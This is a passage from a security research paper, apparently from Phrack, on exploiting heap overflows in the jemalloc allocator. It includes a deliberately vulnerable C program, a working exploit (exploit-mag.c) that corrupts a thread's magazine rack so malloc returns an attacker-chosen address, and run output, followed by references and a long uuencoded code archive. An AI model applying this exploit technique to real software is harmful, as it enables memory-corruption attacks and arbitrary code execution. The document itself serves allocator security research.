(size_t)pthread_self(); char *p1, *p2; /* Allocation performed before the magazine rack is overflown. */ p1 = (char *)malloc(16); printf("[%u] p1 = %p\n", self, p1); sleep(4); /* Allocation performed after overflowing the rack. */ p2 = (char *)malloc(16); printf("[%u] p2 = %p\n", self, p2); sleep(4); return NULL; } int main(int argc, char *argv[]) { size_t tcount, i; pthread_t *tid, vid; if(argc != 3) { printf("%s \n", argv[0]); return 0; } /* The fake 'mag_t' structure will be placed here. */ printf("[*] %p\n", getenv("FAKE_MAG_T")); tcount = atoi(argv[1]); tid = (pthread_t *)alloca(tcount * sizeof(pthread_t)); pthread_create(&vid, NULL, vuln_thread_runner, argv[2]); for(i = 0; i < tcount; i++) pthread_create(&tid[i], NULL, thread_runner, NULL); pthread_join(vid, NULL); for(i = 0; i < tcount; i++) pthread_join(tid[i], NULL); pthread_exit(NULL); } The vulnerable code spawns a, so called, vulnerable thread that performs an allocation of 256 bytes. A user supplied buffer, 'argv[2]' is copied in it thus causing a heap overflow. A set of victim threads are then created. For demonstration purposes, victim threads have a very limited lifetime, their main purpose is to force jemalloc initialize new 'mag_rack_t' structures. As the comments indicate, the allocations stored in 'p1' variables take place before the magazine rack is overflown while the ones stored in 'p2' will get affected by the fake magazine rack (in fact, only one of them will; the one serviced by the overflown rack). The allocations performed by victim threads are serviced by the newly initialized magazine racks. Since each magazine rack spans 256 bytes, it is highly possible that the overflown region allocated by the vulnerable thread will lie somewhere around one of them (this requires that both the target magazine rack and the overflown region will be serviced by the same arena). Once the attacker is able to corrupt a magazine rack, exploitation is just a matter of overwriting the appropriate 'bin_mags' entry. The entry should be corrupted in such a way that 'curmag' should point to a fake 'mag_t' structure. The attacker can choose to either use a large 'nrounds' value to pivot into the stack, or give arbitrary addresses as members of the void pointer array, preferably the latter. The exploitation code given below makes use of the void pointer technique (file exploit-mag.c): int main(int argc, char *argv[]) { char fake_mag_t[12 + 1]; char buff[1024 + 1]; size_t i, fake_mag_t_p; if(argc != 2) { printf("%s \n", argv[0]); return 1; } fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16); /* Please read this... * * In order to void using NULL bytes, we use 0xffffffff as the value * for 'nrounds'. This will force jemalloc picking up 0x42424242 as * a valid region pointer instead of 0x41414141 :) */ printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p); *(size_t *)&fake_mag_t[0] = 0x42424242; *(size_t *)&fake_mag_t[4] = 0xffffffff; *(size_t *)&fake_mag_t[8] = 0x41414141; fake_mag_t[12] = 0; setenv("FAKE_MAG_T", fake_mag_t, 1); /* The buffer that will overwrite the victim 'mag_rack_t'. */ printf("[*] Preparing input buffer\n"); for(i = 0; i < 256; i++) *(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p; buff[1024] = 0; printf("[*] Executing the vulnerable program\n"); execl("./vuln-mag", "./vuln-mag", "16", buff, NULL); perror("execl"); return 0; } Let's compile and run the exploit code: $ ./exploit-mag ./exploit-mag $ ./exploit-mag 0xdeadbeef [*] Assuming fake mag_t is at 0xdeadbeef [*] Preparing input buffer [*] Executing the vulnerable program [*] 0xbfbfedd6 ... The vulnerable code reports that the environment variable 'FAKE_MAG_T' containing our fake 'mag_t' structure is exported at 0xbfbfedd6. $ ./exploit-mag 0xbfbfedd6 [*] Assuming fake mag_t is at 0xbfbfedd6 [*] Preparing input buffer [*] Executing the vulnerable program [*] 0xbfbfedd6 [vuln] v = 0x28311100 [673283456] p1 = 0x28317800 ... [673283456] p2 = 0x42424242 [673282496] p2 = 0x3d545f47 Neat. One of the victim threads, the one whose magazine rack is overflown, returns an arbitrary address as a valid region. Overwriting the thread caches is probably the most lethal attack but it suffers from a limitation which we do not consider serious. The fact that the returned memory region and the 'bin_mags[]' element both receive arbitrary addresses, results in a segfault either on the deallocation of 'p2' or once the thread dies by explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes should be triggered _before_ the thread exits or the memory region is freed. Fair enough... :) --[ 4 - A real vulnerability For a detailed case study on jemalloc heap overflows see the second Art of Exploitation paper in this issue of Phrack. --[ 5 - Future work This paper is the first public treatment of jemalloc that we are aware of. In the near future, we are planning to research how one can corrupt the various red black trees used by jemalloc for housekeeping. The rbtree implementation (defined in rb.h) is fully based on preprocessor macros and it's quite complex in nature. Although we have already debugged them, due to lack of time we didn't attempt to exploit the various tree operations performed on rbtrees. We wish that someone will continue our work from where we left of. If no one does, then you definitely know whose articles you'll soon be reading :) --[ 6 - Conclusion We have done the first step in analyzing jemalloc. We do know, however, that we have not covered every possible potential of corrupting the allocator in a controllable way. We hope to have helped those that were about to study the FreeBSD userspace allocator or the internals of Firefox but wanted to have a first insight before doing so. Any reader that discovers mistakes in our article is advised to contact us as soon as possible and let us know. Many thanks to the Phrack staff for their comments. Also, thanks to George Argyros for reviewing this work and making insightful suggestions. Finally, we would like to express our respect to Jason Evans for such a leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of the best (if not the best) allocators out there. --[ 7 - References [JESA] Standalone jemalloc - http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git [JEMF] Mozilla Firefox jemalloc - http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc [JEFB] FreeBSD 8.2-RELEASE-i386 jemalloc - http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/ malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain; only_with_tag=RELENG_8_2_0_RELEASE [JELX] Linux port of the FreeBSD jemalloc - http://www.canonware.com/download/jemalloc/ jemalloc_linux_20080828a.tbz [JE06] Jason Evans, A Scalable Concurrent malloc(3) Implementation for FreeBSD - http://people.freebsd.org/~jasone/jemalloc/bsdcan2006 /jemalloc.pdf [PV10] Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8 exploit - http://vreugdenhilresearch.nl /Pwn2Own-2010-Windows7-InternetExplorer8.pdf [FENG] Alexander Sotirov, Heap Feng Shui in Javascript - http://www.phreedom.org/research/heap-feng-shui/ heap-feng-shui.html [HOEJ] Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap Overflow Exploits with Javascript - http://securityevaluators.com/files/papers/isewoot08.pdf [CVRS] Chris Valasek, Ryan Smith, Exploitation in the Modern Era (Blueprint) - https://www.blackhat.com/html/bh-eu-11/ bh-eu-11-briefings.html#Valasek [VPTR] rix, Smashing C++ VPTRs - http://www.phrack.org/issues.html?issue=56&id=8 [HAPF] huku, argp, Patras Heap Massacre - http://fosscomm.ceid.upatras.gr/ [APHN] argp, FreeBSD Kernel Massacre - http://ph-neutral.darklab.org/previous/0x7db/talks.html [UJEM] unmask_jemalloc - https://github.com/argp/unmask_jemalloc --[ 8 - Code begin 644 code.tar.gz M'XL(",&7<4\"`V-O9&4N=&%R`.P]^W?3.+/\6I^S_X,V+31ID]3.LS2D=PL4 MEON5PFW+?GL6.,&)E<:0V,:/OMC^[W=&#[^2-&F[38&UH79L2?/22#.2I7'/ M-NC&@[L]5#B:]3I>M69=C5_E\4#3FM5:5:LVM-H#55-KU>8#4G^P@"/P?-TE MY('N'CM7Y9N5_H,>/:S_DV!HE=S`*O?NK/X;M=JT^M>:S3K4?Z/6;#8TR`CU M7ZF!&A`UJ_\[/Y9-JS<,#$IRXH=7'N1^4:+'0[/+GORBF)9/1KIIY?$'B*-7 M)+T!R&X-?I^\_U@@WWY1B'AD6[1(UOQ3&\\#E^)=WPY,9(GI"+P$.*XD*.?SSWTR!,.9ON#E2L2 M1H[ZL=#BV5SJ!ZY%5'9[R<&M"4QDK?!(4*!^)&TB"=!]>YAG<#0&!\M(=#O# MH=W3?=,Z)CKP$%A?@`FB-4CWW*<>^0P*1?JV2_J!!>1P*D`<")W+IC#2$41> M:_!$"9AG>N@P)N"&ITY!W3==P!.BKU8X^A`CB'X<8[62Q,@S"8QPDV;U+76! MDQ'B&]DNE5B(+NBPK0@A9,R;`$UM$1.J22!2CA.0*.6DHC()O'CK91* MUZ7Z%\>&C'E>:$1'/><\CU)<)S7HN?!2%"I=)`)TJE@4(9R;ZNN*:!_ MB@_BNU>MK_@X%` M,VO_BS@VUA2R1I[J'C7`YR!=NX(Z`&:>N.;9JH>)N4-HWP.TML_6U\D?;X\. M/+`I;P>NWOM"_K"'P8@2]4PGKSPOP%_532BUH40^Y!//-TR[/-A./F*>9?(9 M6*_CY+/`,B$K/E.802==(%7Y)GV&$]VG6PJ[PX,9Q6[0?U^M?&SQQT[0'9J] MK3!+^./$-HVHH`V&'/I!YE.A805:"F'JM_`7'I"$9A_0%/%WH16F7D:4G)BN M'^A#AB7"R2CWH"NUCB>"(6?0TDEHK3.JFDF2Q.!,,Q-8''Y3AC*E!/K`\ M\]B"!@N9"BQ9<)`NUKVZ6+<@T,G15;M-JERNWY1)\K1/8$`PM$_9`,2U1X(] MR&!S?,Q+#8NRU-(V:UOA8$I))'?CR96Q9"@]5D6B6/@\3`A]6R76%N/D!YY^ M3+$UD2>`3]MFETIJT!@?,VHM!V=M[\ZSS>F?_Y=YN;(Y9ZE\'-:\\R(5ER+/?W^W_!_S@&M,4-,4R MY?7.GSM[KU[ND[R1M3RBVR>L4A\V]>'+64I\J_@!CU'$`O\8B.`-:<(?]Y[!AZ')DM] MX9F`,"%?D>2.@'?2I<PCIMHNS-(;)YES+R-@2SGCF0V+XS&MT M^X2(*76.OA!+8[.RRM(2@(528:V\S2>;?"'_"(B.<:L!44M+9I_DL>2O;;+[ M:O^/G3T.+,T//D)/*K=[YM">#U+A7"#5IG4"8(T8M0\O`O3"9*$P@6&\5.#_ M!'Z3[PR2S,OJAO()@.3)DS8P<@/^R3K1TC(`?UF]2_819TP$RX!W[V7G\-5? MX(]V8!S.''9E*:$$\48@U;O%E9>[R5/S+-,AC,*F0+L"""\+RME7KJU3"!$Y M')?HN$"GR3.)@F$`@;)308@U(=4(Z]PRKZXNCYDJAG:<69+;D46V9(^4ZHD9(:(JM)9@D=T_(56R%L/YZ)%\GM?> M`06DRCNRL,!Z.\[2]C;))W2CI!4*I"3)ODI>/,,\.H!297WLM)I9"GMV"752 MMRYU(E0%Q@\(C.35LX<79P4Y7Q=EYGZ"./LNTR*&1F!=HF>FG]?$W24[\ZI: M3_`DO*3`T[M#VF%DYQE;,>IYN6T0;^CR@/A!G!P3>\'#+>`T3/:J9K'C/Y<]&?T3 M2X)FC?^JU7IJ_%>OU:O9^.^['/_=_%.+DHC]-YW7;_[8O8J^&=2Y M$\E#8%\1F#.KO-W]##_(R#ZAL;)`*I;V+F:+AR^\&>@6FV<'DU@J;<=&-\P6 M\IJ]F;#JF;#F%1:,'>MS:M?NP0$D'['TY_.+S:5>,/1_6KFI=Z1;[6DRVITM MH?85$MJ]J7R6<,$=ZWL!`>]UYQ'5IO:XD@EJ#D%IC>IF[0XE]=TJQ@_05=^- MW&ZJ'YG`0&`Q81E26`YO.]F8<7'C/S'\`Y6X\_6_CR]K^8X]KK/QRN&+-W[NJ>1UW_UCL`]H]^/]C=>7X(;KBB\+4BBM!-K#E? M+'"'ZF&K2<)%^+C(A&MOQ[0,TB9KT0;(M0)DCY;FQ]?NAR5B:U'@$E_1S]^+ MC2W+*_`%?&R]'+XFB=;*C;VT>.CE"UN$KR`T+2)B>+!UHZ33Z0=6K]-A"TOD MZPRQB%\3[[/%$DRQ`#XD6:+/CRV&1`P]?UC@`4Z@]E@9P/8H+(Q+9'"!(E\] M^B@IOJ+$E7Q<@&-N#@%_/EP;&;(9O@\:6Q9Y#[RS.A,24!?.VQ)O,?F8TK93 M:LQ7.8G"3,'8#M7Q155LU13UQ5+?F^GYDFCJD,1_>.]E8_R8VNXRU^JL1;8: MN4#YV/9M]).HPSF**Q\2&H*E\XCIZ@>RS#4TCSE[( M!"!!U>2@M^9_O-__Z)B("SXK]4*\WT^*^J9O&?OD__+W+K[G+_ MYU2+5A2V*;9.>'C<83'4BCR4&N^)<0\FC]DA5A;/9:+8.A1A&B38>2R#[?AE MF1\M0T026W<\R2P(8R^W4NZ_V=T_*K06;R^60J%A5#FYFU)[5\!M(Y(/:;Y3 M4>?"HO.:<%$.-TGQ-4$\/EVLWIR9]([HR*,^+@E:U5=C95D%?HT1"?T]P^;$ M,I$U4DFL,+R"6%G^(=_;E:`X#5.*_NM,\M-6*P03,\]"-[ZR'31MY%.N9!4K M\F8S^D\S6;QSUG`/4?ZK]'"YY_HO-LSW;?_%^H\%V/^&VDC'?ZA7FMG\SV+L M_PV,,X\9M\.R M\'(R`P%70Y;"X+D]C'6@#TW_O(S9,);#I+DE3LQS@`9&\9S(+$@15V&"*A[# M;7K6*G0=9X[-8MX%OF<:%&'$\)>5!+Y3XOG'2-F`\)N6F/==%O2$>NE8S,"D"^.S.0;GGA= ML_3M=H2.)<;QB3F%2YREF,8$AIX=9Z*ES$5I"*-O0ZDN7ENIQPS^(Y8$?B$C MD8U5!:;/;(@I"OB"V?=Q`-:Q:P>.)V`4/L8+,.#\-SA[/`.2+K;6?N;6\#-8 M0Q,N?%P:RD_`.*9I$$7RN8#FL:^#QG!XES.DB#[1OTN(,<;'I0HOLD1AAN8M1[`^JQ,A&X,B^69-7$@!3([C9GNU22H1#F M4>-KB64NB)?*7)9$35N2R;*<7?=SR7-HVU\\XN@>*SR:*$@MH3-)&4[DET4" M69P4IT`U(S*NV:N,SV;-,1/_*_9_ MZ3XU;K\$[`;K/ZM:%O\Q6_^5'??7_E/3/F73NK/V7QV/_UJI9^U_(0>?/CL: MF!X94!T<`/DEHBZ51`+:) MX4$.J#[D;P0\K%1I!22*6)R0J1$\KA_(Q)A$^)4"XTO7%B:Q[X17@>FOW8,W M/P77MPIU?2&_"'.;4-<3@<2C#L^L%VRY0A:LAXKBW1:B.FK/54=7!"(6X@L# M$./W?@JI0#M74'';$-A),=TP!/8D(-I/*>MKAL:^$#*Y,C1V*M//J:0_=LCL MBT3`[(N)X;(O)@?+OOC'0V5/U8GXVF^HD3!4]I2:(7^GS8X(%SW5\MP\H+:1 M"J@MXH&Z5P309FLV`T#F^"YXA0YY%!,C$]I,DAXZ,+:%T>C70/?Q'0DK#HH- M1.9BV:**C+3`22N")"LF>2\TG5SR/!R<*K*'`<"YOWF?X;V-%*%J%N3[IQ__ M)_9_WNX5P`WF_YO-[/NOV?Q_=GP/[_]N/04X*_Y_;3S^0[.>[?_YWN?_$L^Z MMCV<8Z/X8G8/S=XF/O9Y-IS1@X>-&G[A307G32L2`ZZ&%D]9TQUX!F=(73/8 M;\/1DA.&@5QW&]],I*O7V6`JFQ[;9*I>L8DH]@4CL8,('L-H$F0683@\VCDZ MC*U:D4N!Y!AQTO[*.]F%%#GIERGI.#<2C\/DX_RD`A+$H,HA^;HZMD/-N([4 M#)I0*^-?H%:&IB=^?':4EU`^SI_#VC%J\?/BA-]BKS MPQ-=R02(43/46#/48@]ETV2(P$R(30^SOM@5AZ"2=6XQ<#Y*YW#&/ZPUWO1G MLI9N[S.$93C7@2@:R!7B,KBXC+BXI,()<TRJI\5^MTB.TQ*# MQ9D1=`%-V?R/;/^AB!XLH/TWJA6U'L[_:,VJQMI_MOY[4>V?R`Y@F;P,J.>1 M$WT(5_XF[MSSZ:AD4`>L);Y]/-%=$]N?AWN!"#?IY+7^A?9->%A&&-3"345\ MU>C+_7=D1_0FI%)NU"$'_B//;.?<-8\'/LD_*Q#M,7XQ"LY5=JZQJ[IX+9Q@LXX\41YULU,!0E@CLT3$%-@#)PJ#LR/0\2"?@X/1!`D1@FSG1U`Q`BRG-D&[BKRO2!E&7HZ\8/LKR,2:]K MW@!(-GU3'YH7#&-9)$TK!10]I8`!R'QJ@[M#@821`T6A-I7G[W;VGNT<[K:U M%ML9[_I$/B++3!->_^>0@(Y`7XNS;-#7@CWX]M?A[YT_=@\.7[W97_>H?YG# M%]EY.@J&J!;>H$"V-PQZLF$%PR&I;#_2>-],MJ#KC7+!#;ILSUX_;V/",GGK MTE*M7,%-9B@NC]A]\AFVPL!H1@C8+^0AV7%?;R7_=(Z9BLAA!7VZMX M7854X,X&)=A_TWFY]^9IY_#=T\,CA:V_(*2G>Y1\RN,&NI)=`#Y#GC^AR5G. M0YXU]CF%M0)CG8&#O/PCXJ35$GED*CQ1J*?WT"HIBNYUK&%[55E51,VP!PJ* M";Q:ME&/#&VX\$E3:)2ZASL:#^TA-%:/-,E&X+FLD7,_N(P@T32V5S\LYE@- M,:Z('[.NURX0%F3JTZAYQXI2 M+)9$AVP!01QQGSST;H6VS^:@)J'%E%791*1X`&^>:6/0ZVXP[PPZ$O@O<29; M#ZLKUB!9V'/@,=:3I"Y5D!/F6." M3$E<(@_.IP#,3^E\Y36>(23M4TMBQ$FRZXG MQF=:IM`>2KVPLD0FF0'A]''DD`(E`(5JE0*2!($=(AIH"MTYM&3HW?3AJ7[N M$>9+1,T0;-/;G:/?.X>[;W<.=H[>'`CSA%^8I7ZH1CR*#[H(0]VTF)7I8C_(\)4`'?IZ^5=]TMDY M[#""_[NS]Q]RBM!ZN#S<8%TG4LOWU1"7/;@ MD5`-*:%&$H4QUB&IFA(;94!0MH-P#H)3[`Q\FAN<8JY35`I[*I$B4$=@.)F# M04Z2MS=JM,$&S:GA&.90LH"5&N/;2',H$U#L+N!&J!AVR2L8N#7V)@WT?!E# MU>(2IG2]?7)2.SWRH!AH)R$Q9G8\+%0HC.=5!'LG@&1S?(QENRKHEB#S7YF[ MCAX!7`@JQU>B?,V](7/I'(J#F+$';))Z`)3%NI4<=2CF$3:')BT@A/`J32:( MRU&PH5MGKOCAZ;YC:@R@K1?T9$0F%=%"@R8#5,4*:(F&-$&Y0_"2V]5RE`)* M]D<^]`*4`2NO_-S?$Q>_-$\1LQ1A#K^"I2;+,#)!IQ'JV/?W&$H+]\\_)4$N MKJ3E#`I+4Q+/UL+M1B.T/R3Y0%R'R\G"%5.(!R3,"Q]J\G9V/%@;L"Z1&P`? M'1%V@OJ(A0P11'WM[_O5%[Z:S-!"_DUJS17_D#!>T:](8K7J% M3P7.1FP8!Q9[#<$00B&QPP]OR#1%H=NTE@0-:=MKJBG@)C"<>H)S:JO=KK5905YB:_4ZK=GI\43MN&!$R!,NH M'V'C?$?2R]X':.0$CCF]Z^W3U\WC?O=-H]7:F.%7))?U,[DL<`UYJ^?V-B6N MWO]"Y.JAA(3D_+/W-XI=5JD@>DGG%TE?O:WB5^]OD+]<'AKY8-TP<,%S'??5 MD4%1?(+>Q\G:*U2+A[!+BY(_LTDZ#Q49#?Y-FA#OW959IJ)!H:.4W MF_,0`6:Z#2+,!C]$B)G.)@8E(9H%L``W*UQCJO8_QOKV+?JH(W!HP[HN=`% M!BT>^6`;AL6/6#T7OV_%/WVJ(!,F8W'HGM+$,U'M7?9<\7"17C8`/$"]PLZ. MJ&)N42Q"YGU[A,@&!%M#$$.QB&UR,S$62(/7V3->LHY2-9,VXN+$(6E);0"$ MC*PD.&6@!.;_FHIL`+:3853X!>@5EP;"M8`L5W)@%H6;7`:E:P5Q-Q MX&@!6A,!G/N1J)3X5%K2=X5I(`[V+X)+K`?ZFHZSZ/`:MJISV**2&-^]0@61 M!&XPM"G=\Z65"OP!MD/H6-+Y^#(KTHY9,J0M:Y3Q,&"?9),D,J7D+DZ=S6`_ M6D6`63_C;&;CG4\YY+H!"EQ[MH'4SA,X",WJL,SMT]"$(('.L'UV$DG4HB\B MREC]?Y4JDE3$/DYZ^`^K15"G-1BDPC#G`D](`GX%%<@;2FX`)-2R>I_"K*[G M2OZ[ON>:OK3CZ;.]UZ_'N$5MBFNR+^Z%DU]I/"D8U?T2*4EG':'&)5U.Z36- M:("2/@W)KDA)=*:'-D@-D-R.83\*G4>/07Q9`IA3)PPLAO.Y$"\:I1PEN'M( M@@[A.QB;!//?D;(TG-/@F`M-4L4P.89!Q(5GG2_![#P&@`PVCWJ2E;9F<-)/V98[&=/<>),1S&U-H[X$,F>;2D M7D.&H>&U2*.>[UBZR(4$H M:@HE`E1:U2#.'I`>$AA'/`IG24(_6I080R`/I2H:*W!I*<62YVHTBGP?Y)' M?#+G8EF>TWY6HBE/6Z6#H#F3*2(^Q,D='332\]KX>`ZK-JXBJ'T,U(.`!WQM M2J>1R0366[W5K+=;[4[_=;M3;P3BN-,XZ[?/SF&,NX$C)5HKC97$N>_PT3JS M[%)7O):O>Z^$!WD&)*)_,=,]\.V@DB>R><5*@& MATJ+4#W$!QHA+?D#(Y.CZTY1,EB`Q)H*-.B]Z#KW$$RT=+'8E]CSG'A7&!MINZAP0Z\NEY3,A' MI.32QAU>[J@K!2S-09F,LETO8),[2FR4M=* MP[2``W6>>"II=@1A+9*TWF;!!\)[BV=([WZKO.\5*Q5RX+]2I53P1.]/T0.` MM9&A4ND5,=7#*1XJH%>D2-_$6YI([$PCRY]2[S,47N4W@]Q>I6<0#.Y"Y1/# MP12JKU;8_1$_G_$/9<9,3+Q?^N+D7UAP\3\5F58@A5\Y%!^]2SERFW/6T/U+ M[7^6+I.TTFQRNS2SK3GQ.0/-N>4@5S=MIZ[$,![`]G M:%F$'!O^M2X:][)6B*AQ6F1KR*%P.5$>Y+7RR6?W(42-(LR$\(!Y93);C*<2\4I@A;9Q=R*$'78Q_@,*0MU!.!>C M>7('?!5M"J"X>32+R.R)FY3N$G2(0DW38CT;#Z"G/R[#X9Q>&9<%H,H>L2^> M387C6Z1M/)U-(JVZ3^F$1`KYK/=&C9-4J0?[AUK/+I7B`.FJ^_?J(5@!8_4_ M<$PA&9K<(I\%O0*>=GSV#(W!0QD@?:$J\P"$$?8(9[L`(!1HDN@\X%`[@(!B%=3A;R<`EML";)E>3< MD)^'WA[XG%0B0C(M9XF?#IK#^6B)(X&'I=,E71L0,\8;$#F8`YH4A9V=8I%( M0=YHCM9V-=*7#0UUE-'1W(@`"RN4H*1MHW-/'FDL`**+7M-H,!M]%-7+C0'# M,AP#;=`R;W0Z[8YXQUH\T6H?]U\?O;\?"%G#V6:@[5ZBFH2VE<+>I3Z+HY)= M4KJ0?;XOFM="UH-=RG7A(2*=E9%XBF^[@XRI(#RM?B(32N'TNX*L@*)X@*B! MBY.0/I+@"`_,&*T3/E)0YN6N_%&;*HE-=*`'>&1/(R*J2$(BE,\I7U!X*9=A M08=1!^]);99,5C6M80K/P[WXVE*E0SN!#D/<7<@%Y&0JA M2W1@EBL5LI_U.*!IRP]/"\^53+*1VTZXKR<=XS[=1!/_808Z_Z+Y%^+&W=L) M<=_>%-0=M4&Y;WFZTBM0F,4OP7[M^Y"-3(+>[LG33V6.!(D#_&.L!0J32LLQ M4;"C)Q]@FLI638&JW4I)L=(4J>):QW4R6:`<1OTZSJ9!02P#7E4NC:KU)@NM MK-QSE.W\!G'%M%C"#D;8K_C)`5OD+&*OR_T!9"#YH7V!#:&0.RQEL0_6;H=(*&C>8]R?1`@]^`B^\&@`4&=V,?_\PF<;)[.,\72QO[U;K/SR9M-4X M/V]TNH%7>U4_:KP^?M/\\:?6R6G[[/\ZW?.+GW]Y^^N_=%)9:L&JI&"5(Y,. MQZ/Q`NK?J^X_?_'U-__X]CM52#B)EU-51,LJ@C.1FM$\:RHH7FR>&6T_,MI, MNF\F-4Y^V-)#G]2H,QC285IQ^T9<=N+CKIA%;"T$-UI>L/<4Y"GQ[;%X-<'% MT(HBT?#%R>`DO(%AW:E^][Q:KG[W[7=%UG9&0R\5Z1I`P\H7XJ!<='C&EF-I M'C>COY5WA??FO-05CR+T^R"J]&%846OL5*[W]7K6W;U1I%E/NQ4`11P*K9O[O<_T\ M"H.;:3(4SU9J)3@#[HMV.:`E+BP74.*P0TM2E%XM_=^E\QH2!$(;"A%]5E"9K^`XJ8I%;-# M@H-DS!")V="B@2R7T%1I$@XB$/%)E1:)*=U>(`LBQ!)80C*'%81GOP1*`9W$ M,%OT]0(^_P\-%CZ46:L'/1OB.\PHYGMHCTK-9%(20Q'A2F MS.?D[2RNYT-Z\^VW9',$RZ\&@_Z-7[T4/XA,U2^/@4]FL[U/(?C/*V&UQ#TDDLRJE)M&K2MO3,DN,^L'_*Q^SFL0`$11;M;/&) M-GF+NT2,D@4,5WH@$U6+HAV+D^ZOW5UQE<`JO.2ZJ5+2&N'#F2C//,YS7T?EAT!#KJ^,D<.)H6UP=1]R\70T MP2/QEX=A$N=LRW,%PW3(T)L5!S'_80;G9J0UL>?3!^8@SD">I.69#=(LFTM6 MUP2>3JKU0%KR5(O'KT`T]"M7BSZ[#`L)N![-R9:;_51X5.$@>M_"`8<4KD,>K,5!MLK^WU/"]W_DI:L:H2"1X9817? MU3I8>J.5U?9,`BYOW!;!:XW&V(=-9/2C9:?7)FX]4G MA^F3=[_U3:3R_DG_R]R5'S[,EL]E"=3G:[[>C'HV:'%:2( M*?[Q_=,]\7VV@"CP&YAR9%TJ,0/]?D62XOT]^C*6B`$,P)6Q#[+"JV0$&WR4;?9X"PF`Q)+*&46+E$RN%TD"#1ST50W!Y8ZN M#,CEU.6X:(M>U`?5CRC-T'U'\_(@WMS$$B5?[4.77X]7`9GSX),?$XP<3*(P M[M-%SX#\=$42\/55U^D^UXT;_M';2"+3OO-:Q M`^2!=!;0/>\T3X\S_ZL+/+!L=\ZSH(M."RJ'QBSC\<=E1*T+7'6AU1_':%;] M.D2--LXXM>_P;Y3P/3`RC:>?1Z%!D<^2I:HO`[?G;'UDC9X*>E/[&>C\M=L_ M__6LT>V_(?-YE7:=5A;K&8B5F)Z?#,IGPT.]S5PX>38S=<^/ZOTWC=H1RHEF MCNR5-RL0\G`A_*O%9LWG1S#05._V8F2]6VBF(6&*K\57_+;;T"(-]Q`53GE. M&B?MSJ^YVJ;1-)FOK=K$EN?C[B4AW]>4X[Z>;IZ>;QF?<;QX<'C.CR!?OAK] M>-YFAHO3)N2Q,\"TA#Q9!I2&8'Y5H;^8I,HY"?]8]V'M?W#T^WK2.+P_&@\W`^-Y=+L9"I`> M&,EF^'0<)_,MP>'O6X(52<,U<+;QH#\#K@"L?7R]4#$PZ6^5>\69E1?6\407 MD.KFI7?A3+=Z@+\!JGWC>*W<("!>ZQRPJ'3V800M<^R?&7)J%^=MM-AP6D=. MK>-T:JNN0TS"#IF&/9B(7$X#N:%#?V`; M=V#N0$U.XVT#/\C?%_UZ':.(1T.C^%N7G[KSMMOJM-OG^#V'%M0=O`'4[#C8 M4OQ"Z_'3/*VW+HX:Z'S5I`1GG<;KYEMH#,S#J]_G2;)PU!?#TOF`W.J[".>P M]_7IJ@"WE)W<('9#75V6><_YH\;KKH'0,@AGM91&YQK@9.;.4_@ZO M\3.\'>/G9C&=X!=_QY."DP%^$@B4/XA%D=I)A>+L(%\*PF\TS+SK%/=)*B=< MA.J+[9)D()"@E%=CHE%^Y)5D0#%AG.)I6)_TO+PS$_J0N[2YEVUN=;G-,+]9 MYG=3:Z]UR2T@].A@GRU3N'^8B,M:6M>:0#=A,@):;9@W@\/ANJD*5$4/>S!Z-?EYX M+7A.**0T7O1OHLDLT#[)\*6L2+`,J$U&,9Z[\_3:"$TC*(`O!6?5L:(`#:`0 M"].$0:T@AD@2V"X+,@[YN036%I)M(AGOH?HMQ5NA,&0,"VWLKS#R:?NTX<2) M?-XL0"<0M^1V.&8BM:*WA?'A'`%VL#%HG`VX&.NTI2 M"%AI`,J%K7!^SJ%?5`"-$BT8/DW/##;TV%!GIJPCFD37:,T(4AAPT(C4FKC4 M4SHL=Z=XGJY,),U>J5PG"4)GU!9AW,(:';:JH$LYLUF2 M'N.\4<#[;HRVF(,%&U[RF"'!%WA%<@XL(37-+LA8+-6_/IC>[.(K+)-=$2T& M/I\@AX-!-%._5?U8[.`TF@#F`FB/5A]I-HGH^K2:1/BP33VADZ#N`AH9SH>I M7Y2\._`*GXP6?*9;X(J_;T2F%)MM!!L)9)1G;AR82!>`.XZGMA>,,1)^]HPM MR,P%7>#E-BLS&B0WS][9S%@82L_8`LTH&>K9^Z5\<$%'\IZ:I[4"P16\ND][ MT&=/;<$;Z3#<4QLUQ5)YD(/W<"N(=W<[*,V',![8UO=>AAHVZ.`83\*+C6@( M]@BPX^5ZXES(;/!?P'=I!G*3Y+LQC]'R@8X:(#FR:+DDZ1IQ2K>2I3'*+AKS MCT2,?7E_*;"^I!VIZ/:(1%-K9Q`M1 M7X_BI?DFD^;A?'EA0+]&&H[B)"4[JP28F$FZZO5\,\ITDD<]H`=&TH2QO&#% MGY`N[]0NY9#?HM6C,AV7,HA MOSGZLKU?$8DAJM:<.W-JER8K*V@+;;2'EDD_C=GN\UH^NAUN!!CNS*E=RB&_ M_+';FFWDLJD9&;(Y]P?D_.#-46#Z*: M9.WR\:%WOY6?^;92W176B5MVLI89#X]CKE"^"$`U'0BS]%Q;^WC('A@)-OK" M-#PPB&3]MY=6W@&=[RO]RDCVAMXEM`C+FP,_S.2X4HJR:')+1:'-[-$"?YND MPO7G@PM;Y)=L;`NYEKK.([%-X/%VQ;_9^_?]MFUL80#=_YU?]!2LXJELUY)L MY]+6KC/C.$[JO1/;QW8ZF8DS,B51,AN)5$G*ES8YS_(]ZEDW@`!)76TG:2?= M>V**!!:`!6!A85TKT@%MY<]QJG*]W0I"O9Z(V^'%E'E43_(WLV^XL&P99MV6 M#3#FC_19/^G%SH4+UCDQ;5PZ\ZB?U(/\S720:TD'F05<-N"9/XSG]%$_Z;YR MO7Q?)?XLEU<_9MB14@4-=+;>?=V37_">E)FZBRUY6K"NX-I1Y6L'+ZWT&J)_ M5PM_ZS-(O[)^F3^,Y_31JJ\>Y*^]SB5;R)0"+&=[GGMCG*#Z9::0 M_=/Z9?[(0$H_Z2>UMYN>A"[PPED__\I\EV:8'&!C*2[Q-E(/`!Y0B86'> MBB0NA%_F-0)%7`3#?)"_^.=<(SF5B%%`3T8Q_8Z6-03C.7V4I_-HN0"8R*,N 